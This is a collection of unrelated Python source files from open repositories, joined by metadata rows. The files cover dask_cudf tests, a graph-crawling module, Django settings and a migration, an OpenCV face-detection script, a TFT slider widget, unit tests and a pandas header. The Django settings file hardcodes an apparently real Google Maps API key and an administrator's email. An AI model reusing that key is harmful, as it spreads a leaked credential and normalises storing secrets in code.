mins_pd = ddf.index.map_partitions(M.min, meta=ddf.index).compute()
gddf = dgd.from_cudf(cudf.DataFrame({"a": range(10)}), npartitions=2)
mins_gd = gddf.index.map_partitions(M.min, meta=gddf.index).compute()
dd.assert_eq(mins_pd, mins_gd)
def test_merging_categorical_columns():
try:
from dask.dataframe.dispatch import ( # noqa: F401
union_categoricals_dispatch,
)
except ImportError:
pytest.skip(
"need a version of dask that has union_categoricals_dispatch"
)
df_1 = cudf.DataFrame(
{"id_1": [0, 1, 2, 3], "cat_col": ["a", "b", "f", "f"]}
)
ddf_1 = dgd.from_cudf(df_1, npartitions=2)
ddf_1 = dd.categorical.categorize(ddf_1, columns=["cat_col"])
df_2 = cudf.DataFrame(
{"id_2": [111, 112, 113], "cat_col": ["g", "h", "f"]}
)
ddf_2 = dgd.from_cudf(df_2, npartitions=2)
ddf_2 = dd.categorical.categorize(ddf_2, columns=["cat_col"])
expected = cudf.DataFrame(
{
"id_1": [2, 3],
"cat_col": cudf.Series(
["f", "f"],
dtype=cudf.CategoricalDtype(
categories=["a", "b", "f", "g", "h"], ordered=False
),
),
"id_2": [113, 113],
}
)
dd.assert_eq(ddf_1.merge(ddf_2), expected)
def test_correct_meta():
try:
from dask.dataframe.dispatch import make_meta_obj # noqa: F401
except ImportError:
pytest.skip("need make_meta_obj to be preset")
# Need these local imports in this specific order.
# For context: https://github.com/rapidsai/cudf/issues/7946
import pandas as pd
from dask import dataframe as dd
import dask_cudf # noqa: F401
df = pd.DataFrame({"a": [3, 4], "b": [1, 2]})
ddf = dd.from_pandas(df, npartitions=1)
emb = ddf["a"].apply(pd.Series, meta={"c0": "int64", "c1": "int64"})
assert isinstance(emb, dd.DataFrame)
assert isinstance(emb._meta, pd.DataFrame)
| 28.567696 | 79 | 0.608049 |
ace970546595952b5fcca4a4db24545a9008597d | 6,366 | py | Python | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | graph.py | dezounet/google_hash_code | 48aa82b8b07eb257c91beeb4201d5c39d103e338 | [
"MIT"
] | null | null | null | from slide import Slide
from score import transition_score
class Graph(object):
def __init__(self):
self.nodes = {}
self.max_recursion = 4
def set_max_recursion(self, max_recursion):
self.max_recursion = max_recursion
def get_max_recursion(self):
return self.max_recursion
def add_node(self, node):
self.nodes[node.uid] = node
def add_link(self, uid_1, uid_2):
node_1 = self.nodes[uid_1]
node_2 = self.nodes[uid_2]
node_1.add_neighbour(node_2)
def del_link(self, uid_1, uid_2):
node_1 = self.nodes[uid_1]
node_2 = self.nodes[uid_2]
node_1.del_neighbour(node_2)
def remove_node(self, uid):
neighbours_uid = []
for neighbour_uid, neighbour in self.nodes[uid].neighbours.items():
# Do not edit inplace
neighbours_uid.append(neighbour_uid)
for neighbour_uid in neighbours_uid:
self.del_link(uid, neighbour_uid)
self.del_link(neighbour_uid, uid)
def get_best_neighbour(self, uid):
node = self.nodes[uid]
best_neighbour = None
best_neighbour_reachable_nodes = 0
for neighbour_uid, neighbour in node.neighbours.items():
if best_neighbour is None:
best_neighbour = neighbour
best_neighbour_reachable_nodes = self.get_reachable_node(best_neighbour.node.uid)
elif len(neighbour.node.neighbours) == 2:
# If a neighbour only has another neighbour, do not leave him alone!
best_neighbour = neighbour
break
elif len(self.get_reachable_node(neighbour.node.uid)) > len(
best_neighbour_reachable_nodes):
best_neighbour = neighbour
best_neighbour_reachable_nodes = self.get_reachable_node(best_neighbour.node.uid)
if best_neighbour is not None:
best_neighbour = best_neighbour.node.uid
return best_neighbour
def get_reachable_node(self, uid, max_recursion=None, ignored_nodes=None):
reachable_nodes = set()
if max_recursion is None:
max_recursion = self.get_max_recursion()
if ignored_nodes is None:
ignored_nodes = set()
starting_node = self.nodes[uid]
reachable_nodes.add(starting_node)
ignored_nodes.add(starting_node)
if max_recursion <= 0:
return reachable_nodes
for neighbour_uid, neighbour in starting_node.neighbours.items():
if neighbour_uid in ignored_nodes:
continue
else:
reachable_nodes |= self.get_reachable_node(neighbour_uid,
max_recursion=(max_recursion - 1),
ignored_nodes=ignored_nodes)
return reachable_nodes
def break_links(self, filter_fn):
links_to_del = []
for node_uid, node in self.nodes.items():
for neighbour_uid, neighbour in node.neighbours.items():
if not filter_fn(node, neighbour):
links_to_del.append((node_uid, neighbour_uid))
for node_uid, neighbour_uid in links_to_del:
self.del_link(node_uid, neighbour_uid)
def count_links(self):
link_count = 0
for node_uid, node in self.nodes.items():
link_count += len(node.neighbours)
return link_count
def clean_dead_end(self):
dead_end = []
for uid, node in self.nodes.items():
if len(node.neighbours) == 1:
dead_end.append(uid)
for uid in dead_end:
self.remove_node(uid)
class Node(object):
def __init__(self, uid, slide):
self.uid = uid
self._slide = slide
self.neighbours = {}
def get_slide(self):
return self._slide
def add_neighbour(self, node):
if node.uid not in self.neighbours:
self.neighbours[node.uid] = Neighbour(self, node)
def del_neighbour(self, node):
if node.uid in self.neighbours:
del self.neighbours[node.uid]
class Neighbour(object):
def __init__(self, current_node, neighbour_node):
self.node = neighbour_node
self.weight = transition_score(current_node.get_slide(), neighbour_node.get_slide())
def build_graph(pics, pics_per_tag):
graph = Graph()
# Add node to graph
for uid, pic in pics.items():
node = Node(uid, Slide(pic))
graph.add_node(node)
# Link nodes in graph
for tag, tag_pics in pics_per_tag.items():
for pic_id_1 in tag_pics:
pic_1 = pics[pic_id_1]
for pic_id_2 in tag_pics:
pic_2 = pics[pic_id_2]
if pic_id_1 != pic_id_2:
graph.add_link(pic_1.id, pic_2.id)
return graph
def crawl_graph(graph, starting_node_uid, recursion_strategy=None):
if recursion_strategy is None:
recursion_strategy = {
0: 4,
5000: 4,
15000: 4, #3
20000: 4, #4
25000: 4, #4
30000: 4, #5
35000: 4, #6
40000: 4, #7
45000: 4, #8
}
path = []
current_node_uid = starting_node_uid
path.append(current_node_uid)
keep_going = True
i = 0
while keep_going:
if i % 2000 == 0 and i != 0:
print('looking for node %s' % i)
from collections import Counter
occurrences = []
for uid, node in graph.nodes.items():
occurrences.append(len(node.neighbours))
# counter = Counter(occurrences)
# print('%s (path) -> %s' % (len(path), sorted(counter.most_common(), key=lambda x: x[0])))
# update recursion strategy
if i in recursion_strategy:
graph.set_max_recursion(recursion_strategy[i])
next_node_uid = graph.get_best_neighbour(current_node_uid)
if next_node_uid is None:
keep_going = False
else:
# Cannot move backward to selected node
graph.remove_node(current_node_uid)
current_node_uid = next_node_uid
path.append(current_node_uid)
i += 1
return path
| 29.201835 | 103 | 0.593622 |
ace97077b350da460412bcfd236fc35fb85cdf08 | 11,187 | py | Python | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | config/settings/base.py | bchip50/taichidfw | 238713c04e0bfc010d5994a380a6c34d1926d0f5 | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
# taichidfw/
APPS_DIR = ROOT_DIR / "taichidfw"
env = environ.Env()
READ_DOT_ENV_FILE = env.bool("DJANGO_READ_DOT_ENV_FILE", default=True)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR / ".env"))
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# Local time zone. Choices are
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# though not all of them may be available with every OS.
# In Windows, this must be set to your system time zone.
TIME_ZONE = "America/Chicago"
# https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = "en-us"
# https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = [str(ROOT_DIR / "locale")]
# DATABASES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
"default": env.db("DATABASE_URL", default="postgres:///taichidfw"),
}
DATABASES["default"]["ATOMIC_REQUESTS"] = True
# https://docs.djangoproject.com/en/stable/ref/settings/#std:setting-DEFAULT_AUTO_FIELD
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = "config.urls"
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = "config.wsgi.application"
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.staticfiles",
# "django.contrib.humanize", # Handy template tags
"django.contrib.admin",
"django.forms",
"phone_field",
"django_google_maps",
"taggit",
"taggit_templatetags2",
]
THIRD_PARTY_APPS = [
"crispy_forms",
"crispy_bootstrap5",
"allauth",
"allauth.account",
"allauth.socialaccount",
]
LOCAL_APPS = [
"taichidfw.users",
"taichidfw.locations",
"taichidfw.resources",
"taichidfw.styles",
# Your stuff: custom apps go here
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {"sites": "taichidfw.contrib.sites.migrations"}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = "users:redirect"
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = "account_login"
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
"django.contrib.auth.hashers.Argon2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2PasswordHasher",
"django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher",
"django.contrib.auth.hashers.BCryptSHA256PasswordHasher",
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"whitenoise.middleware.WhiteNoiseMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.common.BrokenLinkEmailsMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR / "staticfiles")
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = "/static/"
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [str(APPS_DIR / "static")]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR / "media")
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = "/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
"BACKEND": "django.template.backends.django.DjangoTemplates",
# https://docs.djangoproject.com/en/dev/ref/settings/#dirs
"DIRS": [str(APPS_DIR / "templates")],
# https://docs.djangoproject.com/en/dev/ref/settings/#app-dirs
"APP_DIRS": True,
"OPTIONS": {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"taichidfw.users.context_processors.allauth_settings",
],
},
}
]
# https://docs.djangoproject.com/en/dev/ref/settings/#form-renderer
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = "bootstrap5"
CRISPY_ALLOWED_TEMPLATE_PACKS = "bootstrap5"
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (str(APPS_DIR / "fixtures"),)
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-httponly
SESSION_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-httponly
CSRF_COOKIE_HTTPONLY = True
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-browser-xss-filter
SECURE_BROWSER_XSS_FILTER = True
# https://docs.djangoproject.com/en/dev/ref/settings/#x-frame-options
X_FRAME_OPTIONS = "DENY"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env(
"DJANGO_EMAIL_BACKEND",
default="django.core.mail.backends.smtp.EmailBackend",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-timeout
EMAIL_TIMEOUT = 5
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = "admin/"
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [("""William D Chipman""", "bill@chipmaninfo.com")]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
}
# django-allauth
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool("DJANGO_ACCOUNT_ALLOW_REGISTRATION", True)
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_AUTHENTICATION_METHOD = "username"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_REQUIRED = True
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = "taichidfw.users.adapters.AccountAdapter"
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = "taichidfw.users.adapters.SocialAccountAdapter"
# Your stuff...
# ------------------------------------------------------------------------------
GOOGLE_MAPS_API_KEY = "AIzaSyBLDpTM3c50sCj3Pw4Yo7Giju-adzTBbbE"
| 39.670213 | 93 | 0.637436 |
ace971367291d8e5e0522f781af9688ce461440b | 1,530 | py | Python | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | null | null | null | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | null | null | null | FaceDetection/ManualDetect.py | imkiller32/ImageProcessing-Finding-Particles- | 4ac4d801203737e27429d102421435ac874d533b | [
"MIT"
] | 1 | 2019-10-07T18:53:37.000Z | 2019-10-07T18:53:37.000Z | #This uses a video loaded from some directory ..You can specify your own path
#----------------------------------------#
#FACE DETECTION USING PYTHON3 AND OPENCV #
#--------AUTHOR- Ritesh Aggarwal---------#
#-----------Language->Python3------------#
#-----------Github:->imkiller32----------#
#---------Enjoy Your DETECTION-----------#
#importing useful library
import cv2
#import numpy as np
def main():
path = "C:\\Users\\imkiller\\AppData\\Local\\Programs\\Python\\Python36-32\\Lib\\site-packages\\cv2\\data\\"
ClassifierPath= path + "haarcascade_frontalface_default.xml"
facedetect=cv2.CascadeClassifier(ClassifierPath)
#resolution
w=800
h=600
#select a video path
cap=cv2.VideoCapture("E:\FILES\motivational\ABC.mp4")
#setting width and height
cap.set(3,w)
cap.set(4,h)
while cap.isOpened():
ret,frame=cap.read()
gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = facedetect.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
#debug
print('ok')
#Red color box over Face
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255),2)
cv2.imshow('DETECTION',frame)
if cv2.waitKey(1)==27: #exit on ESC
break
#releasing camera
cap.release()
#destroy window created
cv2.destroyAllWindows()
print('Bye...')
if __name__ == "__main__":
print('Starting software...')
main()
| 26.842105 | 113 | 0.555556 |
ace9721aef4b1865baac849cac82b6a0d63f37b6 | 773 | py | Python | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | test/django_project/products/migrations/0001_initial.py | sonofpeter-exe/svisor | 4b271674c6674982d5aecf6414f9f59275a50309 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.6 on 2021-09-06 11:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Inventory',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('price', models.DecimalField(decimal_places=2, max_digits=100)),
('description', models.TextField(blank=True, null=True)),
('department', models.CharField(max_length=100)),
('img', models.CharField(max_length=100)),
],
),
]
| 29.730769 | 117 | 0.57956 |
ace9748c1d1ace6fc2999182768eb9d7b2b189dd | 5,082 | py | Python | tft/widgets/slider.py | peterhinch/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 73 | 2016-05-11T07:45:18.000Z | 2021-12-13T13:39:04.000Z | tft/widgets/slider.py | breezecloud/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 2 | 2016-11-23T09:22:13.000Z | 2021-02-05T08:51:27.000Z | tft/widgets/slider.py | breezecloud/micropython-tft-gui | 11837ce83df6b122a33bad1b472e9da5a1e40c22 | [
"MIT"
] | 11 | 2017-09-20T06:37:23.000Z | 2021-04-24T14:29:00.000Z | # slider.py For TFT driver.
# Adapted for (and requires) uasyncio V3
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2016-2020 Peter Hinch
from tft.driver.ugui import Touchable, dolittle
from tft.driver import TFT_io
from tft.driver.constants import *
from tft.widgets.label import Label
# A slider's text items lie outside its bounding box (area sensitive to touch)
class Slider(Touchable):
def __init__(self, location, *, font=None, height=200, width=30, divisions=10, legends=None,
fgcolor=None, bgcolor=None, fontcolor=None, slidecolor=None, border=None,
cb_end=dolittle, cbe_args=[], cb_move=dolittle, cbm_args=[], value=0.0):
width &= 0xfe # ensure divisible by 2
super().__init__(location, font, height, width, fgcolor, bgcolor, fontcolor, border, True, None, value)
self.divisions = divisions
self.legends = legends if font is not None else None
self.slidecolor = slidecolor
super()._set_callbacks(cb_move, cbm_args, cb_end, cbe_args)
slidewidth = int(width / 1.3) & 0xfe # Ensure divisible by 2
self.slideheight = 6 # must be divisible by 2
# We draw an odd number of pixels:
self.slidebytes = (self.slideheight + 1) * (slidewidth + 1) * 3
self.slidebuf = bytearray(self.slidebytes)
b = self.border
self.pot_dimension = self.height - 2 * (b + self.slideheight // 2)
width = self.width - 2 * b
xcentre = self.location[0] + b + width // 2
self.slide_x0 = xcentre - slidewidth // 2
self.slide_x1 = xcentre + slidewidth // 2 # slide X coordinates
self.slide_y = None # Invalidate slide position
# Prevent Label objects being added to display list when already there.
self.drawn = False
def show(self):
tft = self.tft
bw = self.border
width = self.width - 2 * bw
height = self.pot_dimension # Height of slot
x = self.location[0] + bw
y = self.location[1] + bw + self.slideheight // 2 # Allow space above and below slot
if self._value is None or self.redraw: # Initialising
self.redraw = False
self.render_slide(tft, self.bgcolor) # Erase slide if it exists
dx = width // 2 - 2
tft.draw_rectangle(x + dx, y, x + width - dx, y + height, self.fgcolor)
if self.divisions > 0:
dy = height / (self.divisions) # Tick marks
for tick in range(self.divisions + 1):
ypos = int(y + dy * tick)
tft.draw_hline(x + 1, ypos, dx, self.fgcolor)
tft.draw_hline(x + 2 + width // 2, ypos, dx, self.fgcolor) # Add half slot width
# Legends: if redrawing, they are already on the Screen's display list
if self.legends is not None and not self.drawn:
if len(self.legends) <= 1:
dy = 0
else:
dy = height / (len(self.legends) -1)
yl = y + height # Start at bottom
fhdelta = self.font.height() / 2
font = self.font
for legend in self.legends:
loc = (x + self.width, int(yl - fhdelta))
Label(loc, font = font, fontcolor = self.fontcolor, value = legend)
yl -= dy
self.save_background(tft)
if self._value is None:
self.value(self._initial_value, show = False) # Prevent recursion
self.render_bg(tft)
self.slide_y = self.update(tft) # Reflect new value in slider position
self.save_background(tft)
color = self.slidecolor if self.slidecolor is not None else self.fgcolor
self.render_slide(tft, color)
self.drawn = True
def update(self, tft):
y = self.location[1] + self.border + self.slideheight // 2
sliderpos = int(y + self.pot_dimension - self._value * self.pot_dimension)
return sliderpos - self.slideheight // 2
def slide_coords(self):
return self.slide_x0, self.slide_y, self.slide_x1, self.slide_y + self.slideheight
def save_background(self, tft): # Read background under slide
if self.slide_y is not None:
tft.setXY(*self.slide_coords())
TFT_io.tft_read_cmd_data_AS(0x2e, self.slidebuf, self.slidebytes)
def render_bg(self, tft):
if self.slide_y is not None:
tft.setXY(*self.slide_coords())
TFT_io.tft_write_data_AS(self.slidebuf, self.slidebytes)
def render_slide(self, tft, color):
if self.slide_y is not None:
tft.fill_rectangle(*self.slide_coords(), color = color)
def color(self, color):
if color != self.fgcolor:
self.fgcolor = color
self.redraw = True
self.show_if_current()
def _touched(self, x, y): # Touched in bounding box. A drag will call repeatedly.
self.value((self.location[1] + self.height - y) / self.pot_dimension)
| 45.783784 | 111 | 0.602125 |
ace974d264467d429440113d368e8c235d8b4fe3 | 1,088 | py | Python | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | src/accounts/migrations/0004_auto_20211025_2106.py | NikolayTls/CarRental-Fullstack | e535976c25dd77896a355a2d30b5348be90ac040 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-10-25 18:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0003_car_image'),
]
operations = [
migrations.AddField(
model_name='customer',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='reservation',
name='city1',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='return_city', to='accounts.city'),
),
migrations.AlterField(
model_name='reservation',
name='station1',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='return_station', to='accounts.station'),
),
]
| 34 | 147 | 0.650735 |
ace974dc6f7303ba1f6295c3f15108a2b48b2eae | 1,943 | py | Python | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | tests/models/test_units.py | N5GEH/FiLiP | d24f47daa272a65ccf9c92522374bc5228b9a3d1 | [
"BSD-3-Clause"
] | null | null | null | """
Test for filip.models.units
"""
from unittest import TestCase
from filip.models.ngsi_v2.units import \
Unit, \
Units, \
UnitCode, \
UnitText, \
load_units
class TestUnitCodes(TestCase):
def setUp(self):
self.units_data = load_units()
self.units = Units()
self.unit = {"code": "C58",
"name": "newton second per metre"}
def test_unit_code(self):
"""
test unit code model
Returns:
None
"""
for index, row in self.units_data.iterrows():
UnitCode(value=row.CommonCode)
def test_unit_text(self):
"""
test unit text/name model
Returns:
None
"""
for index, row in self.units_data.iterrows():
UnitText(value=row.Name)
def test_unit_model(self):
"""
Test unit model
Returns:
None
"""
unit = Unit(**self.unit)
unit_from_json = Unit.parse_raw(unit.json(by_alias=True))
self.assertEqual(unit, unit_from_json)
def test_units(self):
"""
Test units api
Returns:
None
"""
units = Units()
self.assertEqual(self.units_data.Name.to_list(), units.keys())
self.assertEqual(self.units_data.Name.to_list(), units.names)
self.assertEqual(self.units_data.CommonCode.to_list(),
units.keys(by_code=True))
self.assertEqual(self.units_data.CommonCode.to_list(), units.codes)
for unit in units.values():
cmdout = unit.json(indent=2)
# print(cmdout)
def test_unit_validator(self):
"""
Test if unit hints are given for typos
Returns:
None
"""
unit_data = self.unit.copy()
unit_data['name'] = "celcius"
with self.assertRaises(ValueError):
Unit(**unit_data)
| 25.233766 | 75 | 0.549151 |
ace974f23c418653707f35d7e21a2a72d8ca9776 | 166 | py | Python | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | app/api/__init__.py | liangkezhuma/smallapp | 6807f8fc796eb5be9454e4385bc745ca6a7b4dbd | [
"MIT"
] | null | null | null | from flask import Blueprint
bp = Blueprint('api', __name__)
from app.api import (
users, errors, tokens, categories, brands,
products, orders
)
| 18.444444 | 50 | 0.656627 |
ace975247a7aeb3da51a9bd6ef17c72b4286311c | 369 | py | Python | src/livestreamer/options.py | jaccarmac/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 3,614 | 2015-01-01T08:07:27.000Z | 2022-03-20T00:31:07.000Z | src/livestreamer/options.py | kviktor/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 1,028 | 2015-01-02T03:38:38.000Z | 2021-08-06T16:17:48.000Z | src/livestreamer/options.py | kviktor/livestreamer | ab80dbd6560f6f9835865b2fc9f9c6015aee5658 | [
"BSD-2-Clause",
"MIT"
] | 795 | 2015-01-02T06:12:04.000Z | 2022-03-27T23:41:53.000Z | class Options(object):
def __init__(self, defaults=None):
if not defaults:
defaults = {}
self.defaults = defaults
self.options = defaults.copy()
def set(self, key, value):
self.options[key] = value
def get(self, key):
if key in self.options:
return self.options[key]
__all__ = ["Options"]
| 21.705882 | 38 | 0.571816 |
ace975385ce32196d5bfd47c6adb5063e8fbdcfc | 275,877 | py | Python | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | pandas/core/frame.py | mimikaTU/pandas | 573d4e7e1b354e7ee0cb12280ec58835207106ea | [
"BSD-3-Clause"
] | null | null | null | """
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
